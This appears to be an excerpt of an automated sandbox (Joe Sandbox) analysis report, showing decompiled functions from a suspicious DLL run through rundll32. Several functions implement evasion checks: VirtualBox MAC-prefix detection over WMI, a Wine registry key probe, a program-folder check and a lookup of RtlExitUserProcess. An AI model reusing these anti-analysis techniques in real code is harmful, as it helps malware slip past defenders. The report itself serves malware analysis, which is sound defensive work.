                • Opcode ID: 36f45dcf6cc324aea7ea95bfb9e0a4e2e2cf543717673d982e4480679506c767
                • Instruction ID: c585fe8bd358d64fa430458ca78abb5a7ee6c9941f3974655c8e4bc94cdac740
                • Opcode Fuzzy Hash: 36f45dcf6cc324aea7ea95bfb9e0a4e2e2cf543717673d982e4480679506c767
                • Instruction Fuzzy Hash: FB514377302F60CAEB609F25E88869D67A4FB98FA8F141555EE4E13B68DF38D485C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CDAE0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 130memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1334 215205cdae0-215205cdb0d call 215205d0410 1337 215205cdb13-215205cdb53 SysAllocString * 2 1334->1337 1338 215205cdcb5-215205cdcbf 1334->1338 1339 215205cdbaa-215205cdbb2 1337->1339 1340 215205cdb55-215205cdb58 1337->1340 1341 215205cdbb4-215205cdbb7 SysFreeString 1339->1341 1342 215205cdbbd-215205cdbca 1339->1342 1343 215205cdba1-215205cdba4 SysFreeString 1340->1343 1344 215205cdb5a-215205cdb76 1340->1344 1341->1342 1345 215205cdbd0-215205cdbdf 1342->1345 1346 215205cdca5-215205cdcb4 1342->1346 1343->1339 1347 215205cdb80-215205cdb82 1344->1347 1348 215205cdc85-215205cdc9f CoUninitialize 1345->1348 1349 215205cdbe5 1345->1349 1347->1343 1350 215205cdb84-215205cdb9b CoUninitialize 1347->1350 1348->1346 1351 215205cdbf0-215205cdc0d 1349->1351 1350->1343 1355 215205cdc81 1351->1355 1356 215205cdc0f-215205cdc2b 1351->1356 1355->1348 1359 215205cdc31-215205cdc33 1356->1359 1361 215205cdc64-215205cdc70 1359->1361 1362 215205cdc35-215205cdc3d 1359->1362 1361->1355 1368 215205cdc72-215205cdc79 1361->1368 1362->1361 1363 215205cdc3f-215205cdc41 1362->1363 1364 215205cdc43-215205cdc56 call 215205f9740 1363->1364 1365 215205cdc5a-215205cdc5e VariantClear 1363->1365 1364->1365 1365->1361 1368->1351 1370 215205cdc7f 1368->1370 1370->1348
                C-Code - Quality: 20%
                			E00000215215205CDAE0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				signed short _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t51;
				void* _t52;
				signed char _t58;
				void* _t66;
				void* _t90;
				intOrPtr* _t99;
				long long _t119;
				void* _t130;
				long long _t135;

				_t119 = __rsi;
				r15d = 0;
				_a24 = _t135;
				_v88 = _t135;
				_a16 = _t135;
				_t52 = E00000215215205D0410(_t51,  &_a24,  &_v88, __rsi); // executed
				if (_t52 == 0) goto 0x205cdcb5;
				_v32 = _t119;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0x205cdbaa;
				if (__rax == 0) goto 0x205cdba1;
				_v96 =  &_a16;
				_t13 = _t135 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t135;
				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x205cdba1;
				r14d = r15d;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0x205cdbbd;
				__imp__#6();
				if (r14d == 0) goto 0x205cdca5;
				_t99 = _a16;
				_a32 = _t135;
				_a8 = r15d;
				if (_t99 == 0) goto 0x205cdc85;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t99 + 0x20))();
				if (_a8 == r15d) goto 0x205cdc81;
				_v96 = _t135;
				r8d = 0;
				_v104 = _t135;
				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0x205cdc64;
				_t58 = _v80 & 0x0000ffff;
				if (_t58 == r12w) goto 0x205cdc64;
				if ((_t58 & 0x00000008) == 0) goto 0x205cdc5a;
				E00000215215205F9740(_t90, _v72, L"08:00:27", _v32,  *_a24, _t130);
				_t66 =  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a32 + 0x10))();
				if (_t66 != 0) goto 0x205cdc81;
				if (_a16 != 0) goto 0x205cdbf0;
				goto 0x205cdc85;
				 *((intOrPtr*)( *_a16 + 0x10))();
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t66;
			}






















                0x215205cdae0
                0x215205cdaec
                0x215205cdaf7
                0x215205cdafb
                0x215205cdb02
                0x215205cdb06
                0x215205cdb0d
                0x215205cdb13
                0x215205cdb1f
                0x215205cdb24
                0x215205cdb29
                0x215205cdb2e
                0x215205cdb3e
                0x215205cdb44
                0x215205cdb4d
                0x215205cdb53
                0x215205cdb58
                0x215205cdb62
                0x215205cdb67
                0x215205cdb67
                0x215205cdb6e
                0x215205cdb82
                0x215205cdb88
                0x215205cdb8e
                0x215205cdb98
                0x215205cdb9b
                0x215205cdba4
                0x215205cdbb2
                0x215205cdbb7
                0x215205cdbca
                0x215205cdbd0
                0x215205cdbd4
                0x215205cdbd8
                0x215205cdbdf
                0x215205cdbe5
                0x215205cdbf7
                0x215205cdc03
                0x215205cdc06
                0x215205cdc0d
                0x215205cdc17
                0x215205cdc23
                0x215205cdc26
                0x215205cdc33
                0x215205cdc35
                0x215205cdc3d
                0x215205cdc41
                0x215205cdc4e
                0x215205cdc56
                0x215205cdc5e
                0x215205cdc6b
                0x215205cdc70
                0x215205cdc79
                0x215205cdc7f
                0x215205cdc88
                0x215205cdc92
                0x215205cdc9c
                0x215205cdc9f
                0x215205cdcb4

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                • String ID: 08:00:27$MACAddress$SELECT * FROM Win32_NetworkAdapterConfiguration$WQL
                • API String ID: 1998430482-232164535
                • Opcode ID: f7553d1854f0be2efd49074d230f4674e791f10c2249994692fb1fab6cb662e3
                • Instruction ID: 9423f84b308d07ca6a03fc2a1c86dc7d51784a6032e551859d9aa53b5ff9e2c1
                • Opcode Fuzzy Hash: f7553d1854f0be2efd49074d230f4674e791f10c2249994692fb1fab6cb662e3
                • Instruction Fuzzy Hash: 15513873302F60C6EB209F25E88869D77A4FB94BA8F145155EE4E83B68DF38C885C710
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E2EC0 Relevance: 18.1, APIs: 12, Instructions: 133COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1400 7ffa535e2ec0-7ffa535e2ec6 1401 7ffa535e2ec8-7ffa535e2ecb 1400->1401 1402 7ffa535e2f01-7ffa535e3058 1400->1402 1404 7ffa535e2ef5-7ffa535e2f34 call 7ffa535e33bc 1401->1404 1405 7ffa535e2ecd-7ffa535e2ed0 1401->1405 1409 7ffa535e305e-7ffa535e3079 call 7ffa535e324c 1402->1409 1410 7ffa535e305a-7ffa535e305c 1402->1410 1422 7ffa535e2f36-7ffa535e2f38 1404->1422 1423 7ffa535e2f3d-7ffa535e2f52 call 7ffa535e324c 1404->1423 1407 7ffa535e2ee8 __scrt_dllmain_crt_thread_attach 1405->1407 1408 7ffa535e2ed2-7ffa535e2ed5 1405->1408 1415 7ffa535e2eed-7ffa535e2ef4 1407->1415 1413 7ffa535e2ed7-7ffa535e2ee0 1408->1413 1414 7ffa535e2ee1-7ffa535e2ee6 call 7ffa535e32fc 1408->1414 1420 7ffa535e3085-7ffa535e30ac call 7ffa535e3378 call 7ffa535e33a8 call 7ffa535e3570 call 7ffa535e3594 1409->1420 1421 7ffa535e307b-7ffa535e3080 call 7ffa535e372c 1409->1421 1416 7ffa535e30ae-7ffa535e30bd 1410->1416 1414->1415 1420->1416 1421->1420 1427 7ffa535e3025-7ffa535e303a 1422->1427 1432 7ffa535e2f54-7ffa535e2f59 call 7ffa535e372c 1423->1432 1433 7ffa535e2f5e-7ffa535e2f6f call 7ffa535e32bc 1423->1433 1432->1433 1440 7ffa535e2fd8-7ffa535e2fe2 call 7ffa535e3570 1433->1440 1441 7ffa535e2f71-7ffa535e2fad call 7ffa535e3874 call 7ffa535e3610 call 7ffa535e36d4 call 7ffa535e3610 call 7ffa535e3700 call 7ffa535e6ce4 1433->1441 1440->1422 1449 7ffa535e2fe8-7ffa535e2ff4 call 7ffa535e371c 1440->1449 1441->1440 1468 7ffa535e2faf-7ffa535e2fb6 __scrt_dllmain_after_initialize_c 1441->1468 1455 7ffa535e2ff6-7ffa535e3000 call 7ffa535e34d4 1449->1455 1456 7ffa535e301a-7ffa535e3020 1449->1456 1455->1456 1462 7ffa535e3002-7ffa535e3015 call 7ffa535e390c 1455->1462 1456->1427 1462->1456 1468->1440 1469 7ffa535e2fb8-7ffa535e2fd5 call 7ffa535e6c6c 1468->1469 1469->1440
                C-Code - Quality: 100%
                			E00007FFA7FFA535E2EC0(void* __edx) {
				void* _t1;
				void* _t3;
				void* _t6;

				_t3 = _t6;
				if (_t3 == 0) goto 0x535e2f01;
				if (_t3 == 0) goto 0x535e2ef5;
				if (_t3 == 0) goto 0x535e2ee8;
				if (_t6 == 1) goto 0x535e2ee1;
				return _t1;
			}






                0x7ffa535e2ec4
                0x7ffa535e2ec6
                0x7ffa535e2ecb
                0x7ffa535e2ed0
                0x7ffa535e2ed5
                0x7ffa535e2ee0

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                • String ID:
                • API String ID: 3885183344-0
                • Opcode ID: 3b09c40dbe3440787c7c5c53ee7d12fadfcf4d07a70367e36c859bbc1eee5872
                • Instruction ID: bbf71c4312eac89eec456935d9a7b20769ad314045f6b1ccab871f67e16a33f4
                • Opcode Fuzzy Hash: 3b09c40dbe3440787c7c5c53ee7d12fadfcf4d07a70367e36c859bbc1eee5872
                • Instruction Fuzzy Hash: FD519361D3CF034DFA54ABA194422B9225BAFD7380F8CE0B5E68D67797CE2DE445A700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205F562C Relevance: 16.6, APIs: 11, Instructions: 133COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000215215205F562C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x205f566d;
				if (_t5 == 0) goto 0x205f5661;
				if (_t5 == 0) goto 0x205f5654;
				if (__edx == 1) goto 0x205f564d;
				return 1;
			}




                0x215205f5630
                0x215205f5632
                0x215205f5637
                0x215205f563c
                0x215205f5641
                0x215205f564c

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                • String ID:
                • API String ID: 4221786481-0
                • Opcode ID: ff800ab2db41e843c896150d515926f0aab756e0c4513797aed0fc6be21e75b0
                • Instruction ID: c792cfa794345ba78b274368cb9817998961e2e67a84cd9762842a68c8924a1e
                • Opcode Fuzzy Hash: ff800ab2db41e843c896150d515926f0aab756e0c4513797aed0fc6be21e75b0
                • Instruction Fuzzy Hash: 92514C33703E61C6FA30BB25A45E3E92694AFF7784FA440D5AE494729FDA3CD4898700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CD740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                • String ID: %ProgramW6432%
                • API String ID: 3127241168-1092591020
                • Opcode ID: 240790d4de1382edf41dad9dca8e2698f3845ca8bcdfb4e0c4a6990b92bb54b3
                • Instruction ID: f16045952bbbed8eb5e5e975e6fd43af42a711a0127fbcefa6fd8bc98962bfe0
                • Opcode Fuzzy Hash: 240790d4de1382edf41dad9dca8e2698f3845ca8bcdfb4e0c4a6990b92bb54b3
                • Instruction Fuzzy Hash: D331B133206D90C1FB719B28E41A7E663A1FFE4348F900242DE89975A9EF3DD246CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CF630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 22%
                			E00000215215205CF630(void* __r9) {
				signed int _v24;
				char _v552;
				char _v1080;
				char _v1584;
				void* _v1608;
				signed char _t17;
				void* _t20;
				void* _t24;
				void* _t25;
				signed long long _t30;
				void* _t39;
				void* _t42;
				signed long long _t43;
				void* _t44;
				void* _t46;

				_t46 = __r9;
				_t30 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t30 ^ _t43;
				r8d = 0x208;
				E00000215215205F8EF0(_t20, 0, _t24, _t25,  &_v552, _t39, _t42, _t44);
				asm("movups xmm0, [0x728ab]");
				asm("movsd xmm1, [0x728ac]");
				r8d = 0x1f0;
				asm("movaps [esp+0x20], xmm0");
				asm("movsd [esp+0x30], xmm1");
				E00000215215205F8EF0(_t20, 0, _t24, _t25,  &_v1584, _t39, _t42, _t44);
				if (E00000215215205D00A0() == 0) goto 0x205cf6b0;
				r8d = 0x104;
				ExpandEnvironmentStringsW(??, ??, ??);
				goto 0x205cf6bf;
				r9d = 0;
				_t5 = _t46 + 0x26; // 0x26
				r8d = _t5;
				__imp__SHGetSpecialFolderPathW();
				__imp__PathCombineW();
				_t17 = GetFileAttributesW(??); // executed
				if (_t17 == 0xffffffff) goto 0x205cf70e;
				if ((_t17 & 0x00000010) == 0) goto 0x205cf70e;
				return E00000215215205F59D0(0, _v24 ^ _t43,  &_v1080, _t46);
			}


















                0x215205cf630
                0x215205cf637
                0x215205cf641
                0x215205cf653
                0x215205cf659
                0x215205cf65e
                0x215205cf66c
                0x215205cf674
                0x215205cf67a
                0x215205cf67f
                0x215205cf685
                0x215205cf699
                0x215205cf69b
                0x215205cf6a8
                0x215205cf6ae
                0x215205cf6b0
                0x215205cf6b5
                0x215205cf6b5
                0x215205cf6b9
                0x215205cf6d4
                0x215205cf6e2
                0x215205cf6eb
                0x215205cf6ef
                0x215205cf70d

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                • String ID: %ProgramW6432%
                • API String ID: 3127241168-1092591020
                • Opcode ID: b59245fd65e9b791ab1eaa45c61e82f27590b30b7f03f9e56fb6d21ffa3f5bbc
                • Instruction ID: 6d10b54b1142abde356f056693f0d2a1063605b0cde37b8d69bf06e3a670183d
                • Opcode Fuzzy Hash: b59245fd65e9b791ab1eaa45c61e82f27590b30b7f03f9e56fb6d21ffa3f5bbc
                • Instruction Fuzzy Hash: D4218033316DA0C1FB709B24E85A7EA6361FFE5344F900152DE8A469A9DF3DC255CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D0130 Relevance: 7.6, APIs: 5, Instructions: 56registryCOMMON
                Download Yara Rule
                C-Code - Quality: 17%
                			E00000215215205D0130(void* __rdx, void* __r8, void* __r9) {
				signed int _v40;
				char _v2088;
				char _v2096;
				char _v2104;
				long long _v2112;
				long long _v2120;
				void* __rdi;
				long _t17;
				long _t18;
				void* _t24;
				void* _t26;
				void* _t27;
				signed long long _t32;
				long long _t36;
				void* _t50;
				signed long long _t52;

				_t54 = __r9;
				_t32 =  *0x2067c720; // 0xca1645d940e
				_v40 = _t32 ^ _t52;
				_v2104 = 0;
				r8d = 0x800;
				_t50 = __r9;
				E00000215215205F8EF0(_t24, 0, _t26, _t27,  &_v2088, __rdx, __r9, __r8);
				_v2096 = 0x104;
				r9d = 0x20019;
				_v2120 =  &_v2104;
				r8d = 0;
				_t17 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t17 != 0) goto 0x205d01fc;
				_v2112 =  &_v2096;
				r9d = 0;
				_t36 =  &_v2088;
				r8d = 0;
				_v2120 = _t36;
				_t18 = RegQueryValueExW(??, ??, ??, ??, ??, ??); // executed
				if (_t18 != 0) goto 0x205d01f1;
				__imp__StrStrIW();
				if (_t36 == 0) goto 0x205d01f1;
				RegCloseKey(??);
				goto 0x205d01fe;
				RegCloseKey(??); // executed
				return E00000215215205F59D0(_t24, _v40 ^ _t52, _t50, _t54);
			}



















                0x215205d0130
                0x215205d013b
                0x215205d0145
                0x215205d0150
                0x215205d0163
                0x215205d0169
                0x215205d016c
                0x215205d0176
                0x215205d017e
                0x215205d0184
                0x215205d0189
                0x215205d0196
                0x215205d019e
                0x215205d01aa
                0x215205d01af
                0x215205d01b2
                0x215205d01b7
                0x215205d01bd
                0x215205d01c2
                0x215205d01ca
                0x215205d01d4
                0x215205d01dd
                0x215205d01e4
                0x215205d01ef
                0x215205d01f6
                0x215205d0218

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Close$OpenQueryValue
                • String ID:
                • API String ID: 1607946009-0
                • Opcode ID: 55a56b10943a406aeb13849472735ca925f2f98bffe12306ae4cdfa32b233224
                • Instruction ID: 74deb5944c477600fcbf11e445a648a10e67c29a8c3bd6bf7f019bd29712d979
                • Opcode Fuzzy Hash: 55a56b10943a406aeb13849472735ca925f2f98bffe12306ae4cdfa32b233224
                • Instruction Fuzzy Hash: 8F214C73325E9086EA608B11F858B9AA3A0FFD8B94F505125AE8D47B98DF3CC449CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CF230 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37registryCOMMON
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000215215205CF230(void* __eflags, void* __rdx) {
				signed int _v24;
				char _v536;
				char _v552;
				long long _v568;
				long _t11;
				void* _t15;
				void* _t18;
				void* _t19;
				signed long long _t23;
				void* _t34;
				signed long long _t35;
				void* _t36;

				_t23 =  *0x2067c720; // 0xca1645d940e
				_v24 = _t23 ^ _t35;
				r8d = 0x200;
				E00000215215205F8EF0(_t15, 0, _t18, _t19,  &_v536, __rdx, _t34, _t36);
				E00000215215205CD1D0(_t15, _t23 ^ _t35,  &_v536, __rdx, L"Checking reg key %s ", L"SOFTWARE\\Wine");
				_v552 = 0;
				r9d = 0x20019;
				_v568 =  &_v552;
				r8d = 0;
				_t11 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t11 != 0) goto 0x205cf2d4;
				RegCloseKey(??);
				return E00000215215205F59D0(_t15, _v24 ^ _t35, L"SOFTWARE\\Wine", L"SOFTWARE\\Wine");
			}















                0x215205cf237
                0x215205cf241
                0x215205cf250
                0x215205cf256
                0x215205cf273
                0x215205cf27d
                0x215205cf286
                0x215205cf28c
                0x215205cf291
                0x215205cf2a2
                0x215205cf2aa
                0x215205cf2b1
                0x215205cf2d3

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $SOFTWARE\Wine
                • API String ID: 47109696-2978923392
                • Opcode ID: aca2282ee8955166689f40ec5f0f89f9c8b39eb2a9a0a893a35249dd975d82ff
                • Instruction ID: 794742edf209dd9bb1514a17fa36caf5f65cd309053f13cf7dab1ec84c5cfcb6
                • Opcode Fuzzy Hash: aca2282ee8955166689f40ec5f0f89f9c8b39eb2a9a0a893a35249dd975d82ff
                • Instruction Fuzzy Hash: D4113937726E90C2FB70DB20E8597EA2360FBE5754F900152AE9E56A99DF7CC149CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CA884 Relevance: 6.1, APIs: 4, Instructions: 87memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$AllocQuery
                • String ID:
                • API String ID: 31662377-0
                • Opcode ID: fc9c0bc593f962cbe64dea5118a7e4a816657dd97a63b27e4f18f9465b597b42
                • Instruction ID: 9fa21fa5b97cfd8d6e7e2686763bf7463982c94a7bf28f883306925626997323
                • Opcode Fuzzy Hash: fc9c0bc593f962cbe64dea5118a7e4a816657dd97a63b27e4f18f9465b597b42
                • Instruction Fuzzy Hash: 54318333317A64C1FE218B11A50D7956B90ABE4FF8F194565FE5E17B8CEA7CCA418B00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EEE4C Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                Download Yara Rule
                APIs
                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEE65
                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEEC7
                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEF01
                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEF2B
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                • String ID:
                • API String ID: 1557788787-0
                • Opcode ID: 57fcc6d14fadeefd58268156dcdd6c0be34df16fb2c93034868b229699ff29a0
                • Instruction ID: c642c8e6f55a933ada6c5ae1589ddf869c047f612db210b5182ab2b7cf1b367b
                • Opcode Fuzzy Hash: 57fcc6d14fadeefd58268156dcdd6c0be34df16fb2c93034868b229699ff29a0
                • Instruction Fuzzy Hash: C3216421E39B9585E6209F11644002AB6A9FF89BD0B4CA174DE9E73BD8DF3CE4519740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520614924 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                • String ID:
                • API String ID: 1557788787-0
                • Opcode ID: 924d1869527f3f978518873688abb954fa56a4a06a89cfa16734781b5ab1994e
                • Instruction ID: ec20714ff1b21cc618ba10a6597ebab26782485fb2c7304a9721139acfa9db2c
                • Opcode Fuzzy Hash: 924d1869527f3f978518873688abb954fa56a4a06a89cfa16734781b5ab1994e
                • Instruction Fuzzy Hash: CD21A932706FA0C2EA308F12644825AA7A4FFE4BD0F284565DE9A67B9CDF38D4528700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CA748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00000215215205CA748(void* __edi, long long __rax, long long __rbx, long long __rdi, long long __r9, long long _a8, long long _a16, char _a32) {
				void* _t16;
				intOrPtr _t24;
				void* _t25;
				long long _t42;
				intOrPtr* _t43;
				signed long long _t44;
				intOrPtr* _t52;
				intOrPtr _t53;
				void* _t61;
				char* _t63;

				_t60 = __r9;
				_t42 = __rax;
				_a8 = __rbx;
				_a16 = __rdi;
				_a32 = __r9;
				GetModuleHandleA(??);
				if (__rax == 0) goto 0x205ca811;
				_a32 = __rax;
				E00000215215205CB35C(_t25,  &_a32, "RtlExitUserProcess", _t61); // executed
				if (_t42 == 0) goto 0x205ca811;
				 *0x206830ac = 1;
				if ( *0x206830ac == 1) goto 0x205ca796;
				_t52 =  *0x20683320; // 0x2151e660000
				if (_t52 == 0) goto 0x205ca7fb;
				_t24 =  *0x2068332c; // 0xa
				if (_t24 == 0) goto 0x205ca7cf;
				_t43 = _t52;
				if ( *_t43 == 0) goto 0x205ca805;
				_t44 = _t43 + 0x3c;
				if (1 - _t24 < 0) goto 0x205ca7c1;
				if (1 == 0xffffffff) goto 0x205ca7fb;
				_t63 = _t44 * 0x3c + _t52;
				_t53 = _a32;
				 *((long long*)(_t63 + 1)) = _t42;
				_t16 = E00000215215205CA568(_t44, __rbx, _t63, _t53, _t42, _t60); // executed
				if (_t16 != 0) goto 0x205ca7fb;
				 *_t63 = 0;
				 *0x206830ac = 0;
				goto 0x205ca814;
				 *((char*)(_t44 * 0x3c + _t53)) = 1;
				goto 0x205ca7d2;
				return 0xffffffff;
			}













                0x215205ca748
                0x215205ca748
                0x215205ca748
                0x215205ca74d
                0x215205ca752
                0x215205ca764
                0x215205ca76f
                0x215205ca77c
                0x215205ca786
                0x215205ca791
                0x215205ca79b
                0x215205ca7a4
                0x215205ca7a6
                0x215205ca7b0
                0x215205ca7b2
                0x215205ca7bc
                0x215205ca7be
                0x215205ca7c3
                0x215205ca7c7
                0x215205ca7cd
                0x215205ca7d5
                0x215205ca7dd
                0x215205ca7e0
                0x215205ca7e8
                0x215205ca7ec
                0x215205ca7f3
                0x215205ca7f5
                0x215205ca7fb
                0x215205ca803
                0x215205ca80b
                0x215205ca80f
                0x215205ca824

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModulelstrcmp
                • String ID: RtlExitUserProcess$ntdll.dll
                • API String ID: 4066981444-1735925572
                • Opcode ID: 06c4cfafe3bdbe6131d3fb27be968274d94a8257f10f16205c0f732da387a440
                • Instruction ID: 9c8aaecd2ff8e9149a5b0cc5273ecf47ecea189f77905a9a42faad4e67a28855
                • Opcode Fuzzy Hash: 06c4cfafe3bdbe6131d3fb27be968274d94a8257f10f16205c0f732da387a440
                • Instruction Fuzzy Hash: 4421CB33307FA0C6FA25CB1DA8982956AA2FFE4774F244259ED65077E8DA39C4428700
                Uniqueness

                Uniqueness Score: -1.00%

